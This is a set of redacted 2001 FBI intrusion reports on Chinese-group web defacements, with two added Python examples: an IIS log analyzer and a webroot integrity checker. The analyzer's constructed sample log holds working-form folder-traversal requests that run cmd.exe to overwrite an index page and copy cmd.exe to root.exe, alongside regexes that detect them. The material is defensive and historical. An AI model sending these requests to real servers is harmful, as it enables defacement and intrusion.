COORDINATION: FBI Field Office St. Louis Division 
Government Agency 
Private Corporation 


VICTIM 


Company name/Government agency: _Washington University Psychology Dept. 
Address/location: St. Louis, Missouri 

Purpose of System: Database support, English Lexicon Language (Nationwide research) 
Highest classification of information stored in system: N/A 


b3 


: b6 


System Data: 
Hardware/configuration (CPU): Dell Poweredge Intel platform 
Operating System: Windows 2000 
Software: Internet Information Services (IIS) 5.0 


Security Features: 
Security Software Installed: [ ] yes (identify )   [X] no 


Logon Warning Banner: [ ] yes   [X] no 


INTRUSION INFORMATION 


Access for intrusion: [X] Internet connection   [ ] dial-up number   [ ] LAN (insider) 
If Internet: Internet address: 128.252.27.210 


Network name: elexicon.wustl.edu 
Method: 
Technique(s) used in intrusion: GET command (list provided). Echoing a string of HTML commands and redirecting output to a file. 


Path of intrusion: 
addresses: 1. 210.52.149.171   2. 200.199.223.150   3. 
country:   1. China            2. Brazil            3. 
facility:  1.                  2.                   3. 




Subject: 
Age: Race: 
Sex:: Education: 
Alias(s): Motive: 
Group Affiliation: HONKER UNION OF CHINA 
Employer: 
Known Accomplices: 
Equipment used: 
Hardware/configuration (CPU): 
Operating System: 
Software: 


Impact: 
Compromise of classified information: O yes X no 
Estimated number of computers affected: 1 
Estimated dollar loss to date: 10-12 Man Hours. 




Category of Crime: 
Impairment: Theft of Information: 
[X] Malicious code inserted                   [ ] Classified information compromised 
[ ] Denial of service                         [ ] Unclassified information compromised 


[ ] Destruction of information/software       [ ] Passwords obtained 
[X] Modification of information/software      [ ] Computer processing time obtained 
                                              [ ] Telephone services obtained 
                                              [ ] Application software obtained 
                                              [ ] Operating software obtained 
Intrusion: 
[X] Unauthorized access 
[ ] Exceeding authorized access 


REMARKS 


On May 11, 2001, a database server belonging to the 
Washington University Psychology Department was attacked with 
HTML code which caused a defacement. The attack removed the web 
page and replaced it with a text message: "Fuck USA Government, 
Fuck PoizonBOx, contact sysadmcn@yahoo.com.cn". 


[Redacted], SBC (Southwestern Bell Cellular) Inc., Date of Birth [redacted], 
phone number [redacted], has been working as a [redacted] with Washington 
University. Since [redacted] created the Website and 
database for the Psychology Department to use for nationwide 
research. [Redacted] received his graduate degree from Washington 
University in Computer Science. 


[Redacted] provided SA [redacted] with the system logs, via E-mail, 
which provide a detailed account of the attack. The logs show the 
GET command being used to try and access Port 80 on the victim 
server. 


[Redacted] traced the two source IP addresses and discovered 
that 210.52.149.171 originated from an organization in China and 
200.199.223.150 originated from an organization in Brazil. 
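The technique the St. Louis report describes, a GET request that runs cmd.exe to echo a string of HTML into a file, is also the defacement routine of the sadmind/IIS worm cited in the AMS report (CERT Advisory CA-2001-11), which reached cmd.exe through the IIS folder-traversal bug and its overlong UTF-8 path separators. As an added example that is not part of any of these reports or their victims' logs, the following Python script parses IIS W3C extended log lines and flags requests that (a) traverse out of the web root, including overlong and double-encoded forms, (b) invoke cmd.exe or a copied root.exe, and (c) echo content into a file, reporting the file each echo targets. The log excerpt is constructed for the example: the field layout is assumed, the two source addresses reuse the ones the report names, and the remaining addresses are documentation ranges.

```python
"""Flag IIS log entries matching the defacement pattern in the St. Louis report:
a GET that walks out of the web root, runs cmd.exe and echoes HTML into a file.
The log lines below are constructed for this example, not taken from the report."""
import re
from urllib.parse import unquote_to_bytes

# Constructed IIS 5.0 W3C extended log excerpt (assumed field layout; the two
# source addresses reuse those the report names, the others are TEST-NET-1).
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 5.0
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
2001-05-11 03:12:41 210.52.149.171 GET /scripts/..%c0%af../winnt/system32/cmd.exe /c+dir+c:\\ 200
2001-05-11 03:12:42 210.52.149.171 GET /scripts/..%c0%af../winnt/system32/cmd.exe /c+echo+<html>Fuck+USA+Government</html>+>+c:\\inetpub\\wwwroot\\default.htm 200
2001-05-11 03:14:07 200.199.223.150 GET /scripts/..%255c../winnt/system32/cmd.exe /c+copy+c:\\winnt\\system32\\cmd.exe+c:\\inetpub\\scripts\\root.exe 502
2001-05-11 03:15:00 192.0.2.7 GET /index.html - 200
2001-05-11 03:15:03 192.0.2.8 GET /elexicon/query.asp word=echo 200
"""

# Overlong UTF-8 encodings of '/' and '\' that the IIS folder-traversal bug
# (the hole the sadmind/IIS worm used) accepted as path separators.
OVERLONG = {b"\xc0\xaf": b"/", b"\xc1\x9c": b"\\"}

TRAVERSAL = re.compile(r"\.\.[\\/]")
SHELL = re.compile(r"\b(?:cmd|root)\.exe\b", re.I)
# "echo ... > file": the greedy .* lands on the last '>' so HTML tags inside
# the echoed text are not mistaken for the redirection.
ECHO_OUT = re.compile(r"\becho\b.*>\s*(?P<target>[^\s<>|&]+)\s*$", re.I | re.S)


def decode_request(s: str, rounds: int = 3) -> str:
    """Percent-decode until stable (catches double encoding such as %255c),
    fold the overlong separators, then turn IIS's '+' back into spaces."""
    raw = s.encode("latin-1", "replace")
    for _ in range(rounds):
        nxt = unquote_to_bytes(raw)
        for bad, good in OVERLONG.items():
            nxt = nxt.replace(bad, good)
        if nxt == raw:
            break
        raw = nxt
    return raw.decode("latin-1").replace("+", " ")


def analyze_iis_log(text: str) -> list:
    """Return one finding per request that shows traversal, a shell binary,
    or an echo-to-file, tagged with which of the three it matched."""
    fields, findings = None, []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]          # column names for this log block
            continue
        if not line or line.startswith("#") or fields is None:
            continue
        cols = dict(zip(fields, line.split(" ")))
        query = cols.get("cs-uri-query", "-")
        req = cols.get("cs-uri-stem", "") + ("" if query == "-" else " " + query)
        req = decode_request(req)
        tags = []
        if TRAVERSAL.search(req):
            tags.append("traversal")
        if SHELL.search(req):
            tags.append("shell")
        m = ECHO_OUT.search(req)
        if m:
            tags.append("echo_redirect")
        if tags:
            findings.append({
                "time": f"{cols['date']} {cols['time']}",
                "ip": cols["c-ip"],
                "status": cols.get("sc-status"),
                "tags": tags,
                "target": m.group("target") if m else None,
                "request": req,
            })
    return findings


if __name__ == "__main__":
    for f in analyze_iis_log(SAMPLE_LOG):
        print(f["time"], f["ip"], f["status"], ",".join(f["tags"]), f["target"] or "")
```

Decoding before matching is the point: the raw log line never contains the literal string `../` or `cmd.exe /c echo`, so a grep for those over undecoded IIS logs misses exactly the requests that got through. The third sample line shows why the decoder loops: `%255c` becomes `%5c` on the first pass and a backslash only on the second.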
(Rev. 08-28-2000) 


FEDERAL BUREAU OF INVESTIGATION 


Precedence: ROUTINE Date: 06/12/2001 


To: Counterterrorism Attn: [redacted] 


From: Washington Field 
NS-18/NVRA 
Contact: 


SA (703) 762-3456 


Approved By: 
Drafted By: 
Case ID #: 


Title: HACKER HONKER UNION OF CHINA; 
ILLINOIS SECRETARY OF STATE; 
04/03/2001; 

INTRUSION 


Synopsis: To provide Chicago (CG) with FD-801 reports 
pertaining to the captioned case. 


Reference: Email dated 5/2/01 from [redacted], subject 
"Honkers Union of China", consolidating Honkers 
Union of China leads out of the CG office. 


Enclosure(s): The following seven (7) FD-801 reports 
processed by Washington Field (WF) are enclosed for CG only: 


Details: In support of the ongoing investigation of the 
HONKER UNION OF CHINA, WF has processed seven FD-801 reports. 
CG case agent may review the FD-801 reports for any relevance 
to the CG case. 


LEAD (s): 
Set Lead 1: (Adm) 
CHICAGO 
AT _ CHICAGO 


Read and clear. 
FEDERAL BUREAU OF INVESTIGATION 


Precedence: ROUTINE Date: 05/25/2001 


To: Counterterrorism Attn: Computer Investigations 
Unit, NIPC, Room 5965 


From: Washington Field Office / NVRA 


Squad NS-18 ; : 
Contact: SA (703) 762-3830 . a 
b7C 
Approved By: b7E 
Drafted By: 
Case ID #: (Pending) 
(Pending) 
Title: Subject: UNSUB (S) 
Victim: DESIGNERS AND PLANNERS, INC.; 
Type: ; INTRUSION - INFO SYSTEMS 


Date: 05/01/2001 


Reference: [redacted] 
SUBMISSION: [ ] Initial   [ ] Supplemental   [X] Closed 


CASE OPENED: 


CASE CLOSED: 


[ ] No action due to state/local prosecution (Name/Number ) 
[ ] USA declination 


[ ] Referred to Another Federal Agency (Name/Number: ) 
[X] Placed in unaddressed work 

[ ] Closed administratively 

[ ] Conviction 


COORDINATION: FBI Field Office 
Government Agency 
Private Corporation 




VICTIM 


Company name/Government agency: DESIGNERS AND PLANNERS, INC. 
Address/location: 2120 Washington Boulevard, Suite 200 
Arlington, VA 22204 


Purpose of System: Company web page 
Highest classification of information stored in system: Unclassified 


System Data: 
Hardware/configuration (CPU): Dell PowerEdge 1400 
Operating System: Windows NT, Service Pack 6a, with all patches and hotfixes 
Software: SonicWALL stateful inspection firewall 


Security Features: unknown at this time 
Security Software Installed: [X] yes [ ] no 
Logon Warning Banner: [ ] yes [X] no 


INTRUSION INFORMATION 


Access for intrusion: [ ] Internet connection [ ] dial-up number [ ] LAN (insider) 
If Internet: Internet address: 
Network name: 
Method: 
Technique(s) used in intrusion: 
Path of intrusion: 


addresses: 1. 2. 3. 4. 5. 
country: 1. 2. 3. 4. 5. 
facility: 1. 2. 3. 4. 5. 
Subject: 

Age: Race: 

Sex: Education: - 

Alias(s): Motive: 

Group Affiliation: 

Employer: 

Known Accomplices: 

Equipment used: 


Hardware/configuration (CPU): 
Operating System: 



Software: 
Impact: 
Compromise of classified information: [ ] yes [X] no 
Estimated number of computers affected: One 
Estimated dollar loss to date: 
Category of Crime: 
Impairment: 
[ ] Malicious code inserted 
[ ] Denial of service 
[ ] Destruction of information/software 
[ ] Modification of information/software 
Theft of Information: 
[ ] Classified information compromised 
[ ] Unclassified information compromised 
[ ] Passwords obtained 
[ ] Computer processing time obtained 
[ ] Telephone services obtained 
[ ] Application software obtained 
[ ] Operating software obtained 
Intrusion: 
[X] Unauthorized access 
[ ] Exceeding authorized access 


REMARKS 


[redacted] of Designers & Planners, Inc., a small 
Naval Architecture and Marine Engineering firm located at 2120 Washington Boulevard, Suite 200, 
Arlington, Virginia 22204, telephone number (703) 920-7070, extension [redacted], advised that the 
webpage for his company, www.dandp.com, had been defaced late in the evening of April 30, 
2001, or early in the morning of May 1, 2001. [redacted] estimated damages to be approximately 
$950.00. [redacted] advised he was unable to determine the exploit used for accessing the web page and 
rebuilt the server to ensure no Trojans had been placed on his system. 


[redacted] advised that the index files <<hack.jpg>> and <<inde.html>> were substituted for the normal 
website pages. [redacted] provided a screen capture of the defaced webpage in which a group claiming to 
be a Chinese hacking group by the name of N.D GROUP claimed responsibility. N.D GROUP 
advised that they are the action group of MUDFROG TECHNOLOGY. Hackers by the name of 
[redacted] claimed responsibility for the defacement. A copy of the screen capture is 
attached for reference purposes. 


This Site is Hacked by Chinese Hacker 
Group N.D Group 


1. China is no longer a Country like Yugoslavia, we have 
the best army, navy, air forces & nuclear weapons, 
Don't do anything stupid to interference China's interior, 
and split Taiwan from China. There is Only A China in 
the world, that is People Republic of China!!! 


2.Do apologize to china for the air collision incident,and 
bear all the responsibility. 


N.D Group is the action Group of Mudfrog Technology 
HACKED BY DCBOY AND NIKING 


05/02/2001 
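The FD-801 above records only the symptom of the Designers & Planners defacement: the index page overwritten and two new files, hack.jpg and inde.html, dropped into the webroot, with the owner unable to say how the attacker got write access. The check that surfaces exactly that class of change is a hashed manifest of the document root taken at deployment and diffed against the live tree. The following is an added example, not code from the FBI, the victim or any tool named in the report; the site layout, file contents and the `demo()` scenario are constructed for illustration, and only the two file names come from the report.

```python
"""Webroot integrity check: detect a defacement by diffing a SHA-256 manifest
of the document root against a known-good baseline.

Added example, not FBI or victim code. The site layout, file names and
contents in demo() are constructed; only hack.jpg and inde.html are taken
from the report.
"""
import hashlib
import os
import tempfile
from pathlib import Path


def build_manifest(root: str) -> dict[str, str]:
    """Map every file under root (relative POSIX path) to its SHA-256 hex digest."""
    manifest: dict[str, str] = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = Path(dirpath) / name
            rel = full.relative_to(root).as_posix()
            digest = hashlib.sha256()
            with open(full, "rb") as fh:
                for chunk in iter(lambda: fh.read(65536), b""):
                    digest.update(chunk)
            manifest[rel] = digest.hexdigest()
    return manifest


def diff_manifest(baseline: dict[str, str], current: dict[str, str]) -> dict[str, list[str]]:
    """Classify each path as added, removed or modified relative to the baseline.

    'added' is the interesting bucket for a defacement: files such as hack.jpg
    that were never part of the deployed site. 'modified' catches an overwritten
    index page; 'removed' catches content the attacker deleted.
    """
    return {
        "added": sorted(set(current) - set(baseline)),
        "removed": sorted(set(baseline) - set(current)),
        "modified": sorted(p for p in baseline.keys() & current.keys()
                           if baseline[p] != current[p]),
    }


def _write(root: str, rel: str, data: bytes) -> None:
    """Helper: write a file below root, creating parent directories."""
    path = Path(root) / rel
    path.parent.mkdir(parents=True, exist_ok=True)
    path.write_bytes(data)


def demo() -> dict[str, list[str]]:
    """Build a constructed webroot, snapshot it, simulate the substitution the
    report describes, and return the diff (used by the usage example below)."""
    with tempfile.TemporaryDirectory() as root:
        # Constructed known-good site: an index page, a stylesheet and a logo.
        _write(root, "index.html", b"<html><body>Designers and Planners</body></html>")
        _write(root, "css/site.css", b"body { font-family: sans-serif; }")
        _write(root, "img/logo.gif", b"GIF89a (constructed placeholder)")
        baseline = build_manifest(root)

        # Simulated defacement: the index page is overwritten, the two files
        # named in the report appear, and one original asset is deleted.
        _write(root, "index.html", b"<html><body><img src=hack.jpg></body></html>")
        _write(root, "hack.jpg", b"\xff\xd8\xff (constructed placeholder)")
        _write(root, "inde.html", b"<html>defaced</html>")
        os.remove(Path(root) / "img" / "logo.gif")

        return diff_manifest(baseline, build_manifest(root))


if __name__ == "__main__":
    for kind, paths in demo().items():
        print(f"{kind}: {paths}")
```

Two caveats a practitioner would attach to this check. The baseline manifest has to live somewhere the web server cannot write (read-only media, or a separate host that pulls the hashes), because an attacker with write access to the webroot can rewrite a manifest stored beside it. And a clean webroot diff says nothing about the rest of the host; it tells you the site was changed, not how, which is why the owner in the report rebuilt the server rather than trusting the web content alone.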




FEDERAL BUREAU OF INVESTIGATION 


Precedence: ROUTINE Date: 05/29/2001 
To: Counterterrorism Attn: NIPC- 
SSA 
b3 
b6 
From: Washington Field 
NS-18/NVRA 


Contact: SA (703) 762-3155 


Approved By: 


Drafted By: 


Case ID #: 

Title: Subject: UNSUB (S); 
Victim: UNITED STATES DEPARTMENT OF LABOR; 
Type: INTRUSION - GOVERNMENT SERVICES 
Date: 04/28/2001 


b7E 


SUBMISSION: [ ] Initial [ ] Supplemental [X] Closed 
CASE OPENED: 


CASE CLOSED: 


[ ] No action due to state/local prosecution (Name/Number ) 
[ ] USA declination 
[ ] Referred to Another Federal Agency (Name/Number: ) 
[X] Placed in unaddressed work 
[ ] Closed administratively 
[ ] Conviction 


COORDINATION: FBI Field Office 
Government Agency 
Private Corporation 


VICTIM 


Company name/Government agency: UNITED STATES DEPARTMENT OF LABOR 
Address/location: 200 CONSTITUTION AVENUE 


Purpose of System: Web Server 


Highest classification of information stored in system: None 




System Data: 


Hardware/configuration (CPU): Intel Pentium II 
Operating System: Windows NT 4.0 
Software: Microsoft IIS v5 


Security Features: 
Security Software Installed: [X] yes [ ] no 
Logon Warning Banner: [ ] yes [X] no 


INTRUSION INFORMATION 
Access for intrusion: [X] Internet connection [ ] dial-up number [ ] LAN (insider) 


Internet address: 63.106.133.245 
Network name: 


Method: 
Technique(s) used in intrusion: 
Path of intrusion: 
addresses: 1. 2. 3. 4. 5. 
country: 1. 2. 3. 4. 5. 
facility: 1. 2. 3. 4. 5. 
Subject: 
Age: Race: 
Sex: Education: 
Alias(s): Motive: 
Group Affiliation: 
Employer: 
Known Accomplices: 
Equipment used: 
Hardware/configuration (CPU): 
Operating System: 
Software: 
Impact: 


Compromise of classified information: [ ] yes [X] no 
Estimated number of computers affected: 1 
Estimated dollar loss to date: Insignificant 




Category of Crime: 
Impairment: 
[ ] Malicious code inserted 
[ ] Denial of service 
[ ] Destruction of information/software 
[ ] Modification of information/software 
Theft of Information: 
[ ] Classified information compromised 
[ ] Unclassified information compromised 
[ ] Passwords obtained 
[ ] Computer processing time obtained 
[ ] Telephone services obtained 
[ ] Application software obtained 
[ ] Operating software obtained 
Intrusion: 
[X] Unauthorized access 
[ ] Exceeding authorized access 


REMARKS 


From May 25, 2001 through May 29, 2001, SA [redacted] contacted [redacted], United States 
Department of Labor, 200 Constitution Avenue, 
Washington, D.C. 20210, work telephone number [redacted], 
regarding the compromise of their web server. 
b6 


On April 28, 2001, the www.dol.gov web page had been 
defaced. 
b7E 
The web page was restored from backup and there was no 
mission impact or loss of critical services. The cost associated 
with the restoration of the aforementioned web site was 
considered insignificant. 
b7E 


For reference purposes, one (1) copy of the FD-71 filed 
with the FBI New Haven Field Office and one (1) copy of an email 
sent to SA [redacted] from [redacted] have been attached to 
this document. 
b6 
b7C 



